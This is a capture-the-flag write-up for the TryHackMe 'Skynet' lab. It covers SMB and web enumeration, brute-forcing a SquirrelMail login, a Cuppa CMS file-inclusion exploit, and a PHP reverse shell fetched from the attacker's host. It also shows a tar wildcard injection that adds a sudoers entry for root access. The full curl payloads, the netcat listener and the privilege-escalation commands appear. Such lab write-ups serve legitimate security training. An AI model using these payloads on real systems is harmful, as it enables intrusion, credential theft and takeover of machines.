# Skynet ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbS_KaXGGFniW_7DE_B%2F-MbS_NjTcksIVBd-Mjdd%2Fimage.png?alt=media\&token=700d00ca-5342-4048-a7a1-34ac8064e9bc) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.149.41 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSa5vhqzlOe8mwEk4_%2F-MbSaFdg_MugJFSQOCSh%2Fimage.png?alt=media\&token=777bcf2e-1cf0-4d4e-a554-53e2d48abd53) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80,110,139,143,445 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 22,80,110,139,143,445 -oN nmap 10.10.149.41 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaJffmItblHMRjhBX%2F-MbSajPiV1-wQ-Wrfx6L%2Fimage.png?alt=media\&token=de4cf05a-1e4a-4ba2-9b14-57af13b63791) ## Enumeration ### Port 80: HTTP Lets visit the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSce0Q_8uYPdUQh1gu%2Fimage.png?alt=media\&token=7eea4c45-4458-4d60-b87e-dabffb292d44) It is a search engine, but nothing works if we search something , neither do any of the buttons work. The source code has nothing interesting as well Lets run a gobuster scan to find hidden directories and files ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSdaFY7WL0F-y4wvId%2Fimage.png?alt=media\&token=119e54b6-d3a0-47c5-a11b-e879530049cd) Looks like we found some directories, but we are not allowed to access any of them ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSdjP1D3fi-xwUsdSZ%2Fimage.png?alt=media\&token=f2295000-1625-4cf5-a4ae-0ab3df14153a) After a while we get another hit ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeCSzYPBJf61DU9FW%2Fimage.png?alt=media\&token=b9498741-68f2-4de8-a9c3-9788c1dee7f7) The directory is called `/squirrelmail`, lets visit it and see if we have access to it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeMpAaVrHqni7SlPK%2Fimage.png?alt=media\&token=6d322f40-1888-4ef8-b913-4bcd56e62f87) And we do, its a login form, so we need to find a username and a password. ### Port 139,445: SMB Lets use a tool called `enum4linux` which is a tool that enumerates Samba services on a machine ``` enum4linux -a 10.10.149.41 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeoa229YzUDMppAV2%2Fimage.png?alt=media\&token=219b8277-eeb1-4767-b796-6838646098be) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeth5PWQ0Y_NIqAEK%2Fimage.png?alt=media\&token=fc9bba8a-097e-4f0e-a4d1-9cf973aa1c1c) Looking at the output, in the Share Enumeration section, the Share names print$ and IPC$ are common, but anonymous and `milesdyson` are not common, and `milesdyson` looks like a username, so lets add that to our notes. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSezOWbOJnbNXzJs1T%2F-MbSfdSHCeLLEvOPCOu7%2Fimage.png?alt=media\&token=8b5391f5-3cbb-4827-908a-b7312304e708) Now lets try to access those shares using `smbclient` ``` smbclient //10.10.149.41/anonymous ``` After hitting enter for the password ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSgVX0s_KiJRAmMEK4%2Fimage.png?alt=media\&token=7a73fedf-05a0-4066-a78f-2766bb71bc08) We are logged in. Lets now explore. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSgom9vC_RENNfIhvv%2Fimage.png?alt=media\&token=b0c88dc2-52a2-4caf-aec0-45fac311efe2) There is a directory and a file, lets transfer the file to our machine and the files in the directory to our machine too. ``` get ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSh6yepNy39zwO4iSE%2Fimage.png?alt=media\&token=695fb0e2-3363-4ed6-b581-3035536d6b00) I am only transferring the `log1.txt` file because the other files are empty as shows in the ls output. Lets now read the files that we transferred to our machine. ``` cat ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbShUpF4KWAsW08IsLs%2Fimage.png?alt=media\&token=413655ba-24d7-4c1d-a37b-24415ae000a7) So the `attention.txt` file tells us that all the employees passwords have been changed and all of them are required to change their passwords. And the second file looks like a password list, and the name of the file was log, it might be older passwords, and we can also theorize that someone might have not changed their password, for example the person who wrote the attention note, Miles Dyson. We can try to brute force the squirrel mail service we found on the webserver with the username `milesdyson` and the password list we just saw. Now I wanted to try using `hydra` or `burp` suite to do this, but I was looking at the [walkthrough ](https://www.youtube.com/watch?v=HXikLrFVIXc)of John Hammond and the python script that he made was very interesting and valuable, so I made one and used that to find the correct password. Lets go through the steps he did. Lets first go to the developer tools (`Ctrl + Shift + i`) and then send a request with a random username and password. In the Network tab of the developer tools, we see a `redirect.php` file get created when we hit login, lets look into that file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSkyq0OxA57dlDcoUp%2Fimage.png?alt=media\&token=268508c1-0dd5-4c56-bc04-61566f30bf29) Now lets copy the request , we can do that by right clicking on the file name and going to copy and then click copy as `cURL`. We can now go to a `cURL` to python code request code [converter](https://curl.trillworks.com/), now paste the code in their and then copy the python code to a file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSlhH7amI-yFv3_msF%2Fimage.png?alt=media\&token=dfb14736-db11-440f-b0f4-54aef9487a9b) I'm going to create the file `bruteforce.py` , once you do that we need to modify the code a bit to make it bruteforce the service with the username and password list we provide. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSm16EvJiHv2grwxpS%2Fimage.png?alt=media\&token=e8c416f9-ddcc-45b6-90d5-b837b3db163e) This is how the code looks before any modifications ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSnfI3_vNFWB_LVh12%2Fimage.png?alt=media\&token=72964771-aa5f-408e-9b39-6536d2288760) And this is the code after modifications, I can try to explain what this code does, but I think John Hammond does a better job at doing that, so go watch the [video ](https://www.youtube.com/watch?v=HXikLrFVIXc)he made if you want to understand the code. Now if we save and run the code, we find the password ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSo7D_IiIyD4JEIfmJ%2Fimage.png?alt=media\&token=b1934286-27b7-4fba-b37a-a0f990f3ee4e) The password is `cyborg007haloterminator`, which is also the answer to the first question in this room ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSoGz_ayxmMu0ATO8A%2Fimage.png?alt=media\&token=66c7d444-10f2-4f6d-9eea-b065ff073ae5) ### Port 80: HTTP We can now login into squirrel mail. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSoIPo6VFoUmznAlWI%2F-MbSohx7SqMhZnbIfETF%2Fimage.png?alt=media\&token=dff3455f-3b98-4de9-babb-a96c6202097a) There are three emails that Miles Dyson received, the ones with (no subject) have nothing of interest, but the Samba Password reset email has something really interesting ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSpCrmufw6jassW8vl%2Fimage.png?alt=media\&token=1819d38f-f584-427b-bd39-5d8923b05645) We now have the password for SMB of Miles Dyson, which is `)s{A&2Z=F^n_E.B'` . ### Port 139,445: SMB Now that we have the password for Miles Dyson's SMB server, we can login using `smbclient`. ``` smbclient -U milesdyson //10.10.149.41/milesdyson ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSqcRe0X8fSGqlWCE2%2Fimage.png?alt=media\&token=adc7e30c-23ac-4c12-afe3-9bf21c193f8c) We are now logged in. Lets list what files or directories there are in the server. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSr3pAeu_GedhmnGVO%2Fimage.png?alt=media\&token=92e86247-2fe9-49a8-b9b8-aa50801cb0cb) Looking through the files, there is only one file in the notes directory that looks interesting, so lets transfer that file to our machine. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSrEkpNTRGEFgJapzZ%2Fimage.png?alt=media\&token=72766c0d-bd5f-4984-921e-2c7aafbcfec8) Now lets read the `important.txt` file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSrO7vmJ8fpBDdeCF5%2Fimage.png?alt=media\&token=0fdd0453-3d4c-43fc-b09c-979bb977d622) Looks like the first line gives us a directory that we can visit on the webserver, so lets do that. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSrPNJDSneveitSbr1%2F-MbSrfxDOsQc2qRveIgI%2Fimage.png?alt=media\&token=3ecb89b8-06c5-41fe-8bac-3dcd8c79bc1d) Nothing of interest here nor in the source code, lets run `gobuster` to find hidden directories and files. Also the directory we just found is the answer to the second question in this room ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSrPNJDSneveitSbr1%2F-MbSs0dGlpEaS7LqsUEw%2Fimage.png?alt=media\&token=2553c057-f486-4f9b-8110-fbf9a91141c9) ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41/45kra24zxs28v3yd/ ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSsX3uDRLZ1nZ7ABvB%2Fimage.png?alt=media\&token=c5127fe8-0003-47fd-836f-e3adcb8f6b7f) We find an administrator page, lets go visit it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSsh14jeOvjWRmN7U9%2Fimage.png?alt=media\&token=72ef89a4-b261-4a29-88ac-8f5bbf6a7a0b) Its a login page. If we try to use the credentials we found earlier, it does not work. Looking at the page we have the service name which is `Cuppa CMS` so why don't we go to searchsploit and look if we have any exploits that we can use to exploit this service. ``` searchsploit Cuppa ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStI82K7zIxw3Z_PJ8%2Fimage.png?alt=media\&token=45b58381-ae6a-42f5-aacd-0742eaf34895) And we do, so lets copy the exploit to our directory. ``` searchsploit -m php/webapps/25971.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStWOXSYnAL31Gj6Dx%2Fimage.png?alt=media\&token=a8bf43c3-dc40-4d46-bafa-2d93372649a0) We now can answer the third question in this room. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStgO-AAzWElHzs0eF%2Fimage.png?alt=media\&token=8fc04f2b-ef17-4f8b-9685-b5a3742c8dbe) ## Exploitation Reading through the scripts, it looks like we can see the `/etc/passwd` file, so lets try looking at that file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSutuGTV104jNNjW7L%2Fimage.png?alt=media\&token=955a6f23-48b5-4f19-accc-ba80c833042c) We need to change the target and alerts place holders as well ``` curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSvT76XN0qOiHlrZsZ%2Fimage.png?alt=media\&token=e2862ec4-0456-42ca-a916-7571dbc6ea4b) Looks like it works, so they also mentioned that we can run php files on the server with this exploit, so what if we write a command in a php file and send that to the server by opening a http server on our machine, we can do this because there is a remote file inclusion vulnerability on the web server. So first lets make the file with the command, lets call it `command.php`. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSw_oWMT53YXGwpx7w%2Fimage.png?alt=media\&token=b3176483-b74b-4867-95ca-4c6a25adc3c7) Lets see if the command `whoami` works. Now we have to start a http server so that the victim machine can connect back to us. ``` python -m http.server 8080 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSxc9Kg1rv9KbFYszn%2Fimage.png?alt=media\&token=3d28c862-c5e9-4263-acfe-a0150d14be0c) Now we have to run the curl command to connect to our machine and run the command.php file. ``` curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/command.php ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSxkw-dS63sR1D6RTj%2Fimage.png?alt=media\&token=79eff073-7056-43c9-b510-75ca1c946768) And it works as we get the right output. Now what if we change the command.php file to a reverse shell php file to get a reverse shell on the machine. We can find a reverse shell php file [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). Once you copy the file and change the IP to your tryhackme IP as they mentioned in the file, you can copy it to the directory where you will start the http server. Once you do that change the file in the curl URL and also start a Netcat reverse shell listener with the same IP in the php reverse shell file. ``` nc -lvnp 1234 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT-v1lGHx5C-whvA56%2Fimage.png?alt=media\&token=989985fa-88bc-4908-9c38-c4375ae30eec) Once you do that, use the curl command. Also make sure you started the python http server ``` curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/shell.php ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT06ALmWn32JZkUrPQ%2Fimage.png?alt=media\&token=ad5ebf01-89f8-435b-8b2e-1aa141781e35) After you hit enter, you should get a reverse shell on the machine. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0F3YzqNOrWOddNSa%2Fimage.png?alt=media\&token=f949fdea-9547-43be-a1fa-156b7013e701) You can now read the user.txt which is the answer to the fourth question of this room. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0TPbxqct1JH66-m5%2Fimage.png?alt=media\&token=a9602df8-3eac-42bf-80bc-32c79933b8d4) And you can use these commands to stabilize your shell ```bash python -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm-color Ctrl + z stty raw -echo; fg reset ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0q6g_rYq0OSP9UYj%2Fimage.png?alt=media\&token=7ae2ff2c-c249-42ff-ba98-f414668f3168) Looking at the files and directories, there is a particular directory and file that looks interesting, which is `/backups` and `backup.sh` Lets read the file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT1uAW7oUaeYg5Wqgi%2Fimage.png?alt=media\&token=52884de7-2cd9-4e5c-a2df-e0b12b2ac1b1) It looks like its changing directories into the `/var/www/html` folder and then running a tar command with the other file in the `/backups` directory. Looking at the tar command and at the `*` symbol, I was thinking that there should be a [exploit ](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/)based on this so I went to google and searched for it and found it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT2rHeozDQy-WYu7Yr%2Fimage.png?alt=media\&token=386b9402-5ed0-48bc-87da-81bf2a739564) The part that we are interested in is this ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT3VmtJ5m4LjJJI3F1%2Fimage.png?alt=media\&token=dae92ff0-d7ee-45cd-aa39-26a9d33537a5) I can try to explain what these command do, but not as good as John Hammond, so make sure to go [there ](https://www.youtube.com/watch?v=HXikLrFVIXc)and look at what the commands do and mean. The commands that we will use are: (Also make sure to cd to `/var/www/html` before running the commands.) ```bash echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh" echo "/var/www/html" > --checkpoint=1 ``` Wait for a while and then run the `sudo -l` command. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbT5mRTCZdC4DnHwVpm%2F-MbT5ygLtgiG0dDCeusV%2Fimage.png?alt=media\&token=3c13e383-6b97-46d5-bc1a-b2a719acb981) Now we can run all commands as root, so lets switch users to root. ```bash sudo su root ``` You can also read the root flag which is the answer to the last question of the room. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbT5mRTCZdC4DnHwVpm%2F-MbT6Cun1sp6miv5pGnF%2Fimage.png?alt=media\&token=2315f703-6b37-4503-9fe2-d0daa623bfcf)